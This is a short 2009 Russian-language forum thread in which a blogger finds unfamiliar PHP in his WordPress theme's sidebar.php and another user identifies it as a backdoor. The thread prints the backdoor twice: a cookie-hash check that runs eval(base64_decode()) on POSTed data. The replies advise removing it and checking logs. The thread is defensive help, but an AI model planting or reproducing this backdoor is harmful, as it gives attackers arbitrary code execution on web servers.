Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
Блоги и Социальные сети
»
Тема:
Появился код какой то в вордпрессе
Новая тема
Ответить
цитата
05/07/09 в 20:44
Tagir
Никто не знает блог на своем домене щас редактировал sidebar.php и увидел код какой то непонятный
<?php if(md5($_COOKIE['40796c1078c68c4d'])=="42fb664ad9eb3770c1346c5bf812a847"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['f9f6dcf5c0c0e602'])=="9a013d00b39c0bdce2e1352e919de9c3"){ eval(base64_decode($_POST['file'])); exit; } ?>
что он делает то? Просто на других смотрел нету такого.
цитата
05/07/09 в 21:32
Tagir
Да кстати тема стандартная, щас смотрел в ней такого нет.
цитата
05/07/09 в 21:33
remorhaz
Tagir писал:
Никто не знает блог на своем домене щас редактировал sidebar.php и увидел код какой то непонятный
<?php if(md5($_COOKIE['40796c1078c68c4d'])=="42fb664ad9eb3770c1346c5bf812a847"){ eval(base64_decode($_POST['file'])); exit; } ?><?php if(md5($_COOKIE['f9f6dcf5c0c0e602'])=="9a013d00b39c0bdce2e1352e919de9c3"){ eval(base64_decode($_POST['file'])); exit; } ?>
что он делает то? Просто на других смотрел нету такого.
Убирай немедленно, ломают тебя. Этот код позволяет выполнить на твоей машине произвольный PHP-код, передаваемый через POST-запрос.
цитата
05/07/09 в 21:37
Tagir
Охуеть ты меня напугал
, все снес. Спасибо!
цитата
05/07/09 в 21:41
remorhaz
Не за что
На самом деле лучше попытайся выяснить, откуда этот код туда попал. По логам проследи, не менял ли кто файл. Вспомни, не качал ли дистрибутив WP с какого-нибудь левого места. Ну и последствия проверь - все ли работает, не насрали ли где, не удалили ли чего.
цитата
05/07/09 в 21:43
Tagir
Я забыл права поменять, т.е. оставил запись.
цитата
05/07/09 в 21:45
remorhaz
Вот тебе ещё ссылочка до кучи про этот эксплойт, изучай:
http://cssing.org.ua/2008/06/01/wp-footer-exploit/
Новая тема
Ответить
Эта страница в полной версии